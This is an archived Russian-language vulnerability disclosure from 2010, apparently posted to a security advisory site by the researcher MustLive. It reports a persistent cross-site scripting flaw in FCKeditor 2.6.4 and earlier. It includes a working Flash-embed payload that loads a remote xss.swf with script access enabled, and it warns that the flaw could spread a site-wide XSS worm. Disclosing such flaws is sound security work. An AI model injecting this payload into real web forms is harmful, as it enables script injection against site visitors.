Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23052
HistoryJan 17, 2010 - 12:00 a.m.

New vulnerability in FCKeditor

2010-01-1700:00:00
vulners.com
9

Здравствуйте 3APA3A!

Сообщаю вам о Cross-Site Scripting уязвимости в FCKeditor.

XSS:

Это persistent XSS через Flash.

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"><param name=movie
value="http://site/xss.swf&quot;&gt;&lt;param name="allowscriptaccess" value="always"><embed
src="http://site/xss.swf&quot; allowscriptaccess="always"></embed></object>

Данная уязвимость в самом редакторе, поэтому её можно использовать на любом сайте,
использующего FCKeditor в качестве редактора для веб форм. Данная уязвимость может привести
к заражению всего сайта XSS-червём.

Уязвимы FCKeditor 2.6.4 и предыдущие (и последующие) версии.

О данной уязвимости я упомянул у себя на сайте (http://websecurity.com.ua/3683/&#41;.

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua